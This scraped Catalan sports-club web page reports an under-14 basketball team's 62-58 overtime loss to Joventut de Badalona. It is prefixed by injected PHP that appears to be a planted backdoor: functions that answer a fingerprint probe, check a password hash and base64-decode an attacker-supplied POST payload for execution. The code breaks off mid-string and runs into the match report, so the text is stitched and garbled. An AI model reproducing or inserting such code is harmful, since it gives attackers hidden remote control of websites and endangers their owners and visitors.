function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil masculí 06 A perd contra el Joventut de Badalona a la pròrroga (62-58) - Tgn Bàsquet Club -

L’infantil masculí 06 A perd contra el Joventut de Badalona a la pròrroga (62-58)

Updated: desembre 3, 2019

L’equip infantil masculí 06 A va perdre contra el Joventut de Badalona a la pròrroga en un partit que havia començat dominant. El conjunt que entrena Álex Garrido va sortir molt bé, amb una molt bona defensa que va permetre recuperar moltes pilotes i sortir en transició ofensiva. En estàtic, la circulació de pilota dels liles va trencar la defensa verd-i-negra i el marcador era de 13-22 pels tarragonins. Però la Penya va reaccionar. Tot allò que s’havia fet bé en el primer període es va deixar de fer i al descans el marcador mostrava un 32-28 pels locals.

A la represa, el matx va estar igualat perquè el TGN Bàsquet va mostrar-se més sòlid en el rebot i en defensa, tot i que en atac no estava fi. Això va evitar la progressió dels badalonins que, però, van trobar petroli en el quart període, anotant amb facilitat. Tot i això, els liles van tenir la victòria a l’abast però van fallar un tir lliure decisiu i el matx va anar al temps extra. Allí, l’esgotament físic i la precipitació conscient de la importància del matx van provocar errades que el Joventut va saber aprofitar.